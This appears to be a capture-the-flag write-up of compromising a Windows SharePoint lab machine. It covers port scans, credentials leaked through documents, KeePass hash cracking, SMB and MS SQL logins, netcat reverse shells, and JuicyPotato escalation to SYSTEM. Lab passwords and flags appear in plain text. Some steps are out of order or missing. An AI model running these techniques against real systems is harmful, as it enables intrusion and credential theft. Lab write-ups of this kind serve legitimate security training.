As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions running on those ports.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scan the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of nmap's timing templates.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Mon Nov 7 17:21:56 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.054s latency).
Not shown: 65514 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
808/tcp open ccproxy-http
1433/tcp open ms-sql-s
5985/tcp open wsman
15567/tcp open unknown
32843/tcp open unknown
32844/tcp open unknown
32846/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
# Nmap done at Mon Nov 7 17:22:10 2022 -- 1 IP address (1 host up) scanned in 14.24 seconds
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Nov 7 17:24:14 2022 as: nmap -sCV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 -oN targeted 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-server-header: Microsoft-IIS/10.0
|_http-generator: Microsoft SharePoint
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-11-07T16:18:15
|_Not valid after: 2052-11-07T16:18:15
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
15567/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-11-07T16:25:23
|_ start_date: 2022-11-07T16:17:53
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 7 17:25:33 2022 -- 1 IP address (1 host up) scanned in 79.59 seconds
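The -oN output above is plain text, so it is easy to triage automatically. The following is an added example (not part of the original writeup) that parses port lines in that layout into records and flags the hardening findings the scan surfaced (SMB signing not required, FTP and MS SQL exposed). The SAMPLE excerpt is constructed to mirror the scan above.

```python
import re

# Constructed excerpt in the nmap -oN layout shown in the scan above.
SAMPLE = """\
Nmap scan report for 10.10.10.59
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# port/proto, state, service, then whatever -sV appended as the version string
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_ports(text):
    """Return one dict per port line; script output lines (starting with |) are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports

# Findings a reviewer would raise from this scan; each is a (label, pattern) pair.
CHECKS = [
    ("smb-signing-not-required",
     re.compile(r"signing enabled but not required|message_signing: disabled")),
    ("mssql-exposed", re.compile(r"^1433/tcp\s+open", re.M)),
    ("ftp-cleartext", re.compile(r"^21/tcp\s+open\s+ftp", re.M)),
]

def audit(text):
    """Return the sorted labels of every check whose pattern appears in the scan text."""
    return sorted(label for label, pattern in CHECKS if pattern.search(text))
```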
The website shows a SharePoint application.
Inside the Documents folder there is one file called ftp-details.docx.
Let's get the content of the document with the docx2txt tool.
docx2txt ftp-details.docx
cat ftp-details.txt
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
On the other hand, the SitePages folder contains another item.
http://10.10.10.59/SitePages/Forms/AllPages.aspx
The page contains a message with an FTP username called ftp_user.
http://10.10.10.59/SitePages/FinanceTeam.aspx
Exploitation
Now, we have valid credentials for the FTP server.
ftp ftp_user@10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
331 Password required
Password: UTDRSCH53c"$6hys
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50488|)
125 Data connection already open; Transfer starting.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.
Since the FTP server holds a lot of content, let's mount it on a directory called ftp with curlftpfs.
Let's copy the tim.kdbx file to our current directory, get its hash, and try to crack it with john.
cp ftp/User/Tim/Files/tim.kdbx .
keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo (tim)
1g 0:00:00:48 DONE (2022-11-07 20:04) 0.02060g/s 508.7p/s 508.7c/s 508.7C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have the password, let's open the passwords database with keepassxc.
keepassxc tim.kdbx
There is one entry called TALLY ACCT share with the username Finance and the password Acc0unting.
These credentials are valid for the SMB server.
cme smb 10.10.10.59 -u "Finance" -p "Acc0unting"
SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 TALLY [+] TALLY\Finance:Acc0unting
By listing the shares, we'll see that we can read the ACCT share.
Now we could log in to the MS SQL server on port 1433 with the mssqlclient tool from impacket.
impacket-mssqlclient sa@10.10.10.59
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: GWE3V65#6KFH93@4GWTG2G
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665)
[!] Press help for extra shell commands
We could try to run commands with xp_cmdshell, but it is disabled.
xp_cmdshell whoami
[-] ERROR(TALLY): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.59 50694
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> type \users\sarah\desktop\user.txt
26bf3a939acfe12a9088270ea0fe2d21
Privilege Escalation
Let's start by seeing what privileges the user tolis has.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
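Reviewing which accounts hold impersonation privileges is the check a defender runs to find accounts exposed to this kind of escalation. The following is an added example (not from the original writeup) that parses the `whoami /priv` layout above and reports the two privileges the text names as prerequisites, regardless of whether they are currently Enabled; the sample text is constructed to match the output above.

```python
import re

# Constructed sample in the layout `whoami /priv` prints (mirrors the table above).
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# The two privileges the text above names as prerequisites for JuicyPotato.
# A "Disabled" state only means the privilege is not active in the current token;
# a process that holds it can turn it on, so the review keys on presence, not state.
HIGH_RISK = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# name, free-text description, then the State column
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def risky_privileges(text):
    """Return the high-risk privileges present in the token, sorted by name."""
    return sorted(name for name in parse_privileges(text) if name in HIGH_RISK)
```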
If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
JuicyPotato is a local privilege escalation tool for Windows that abuses COM objects to escalate privileges. It requires SeImpersonate or SeAssignPrimaryToken to be enabled.
To escalate privileges, we'll have to transfer JuicyPotato.exe and nc.exe binaries to the victim machine. Let's set a python HTTP server on the directory where we have those binaries.
python -m SimpleHTTPServer
And download the binaries from the desktop folder of the tolis user.
Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.
nc -lvnp 5555
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Finally, let's run the Juicy Potato binary and get a shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.59 50731
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
7850cfbb5ab1ddefb5406ff662fecec7
Doing some research on the internet, I found a pentest on SharePoint which shows directories such as /_layouts/viewlsts.aspx.
Time to get a shell. First, download the file from Nishang, and add the following function at the end of the script. I will rename the file to rv.ps1.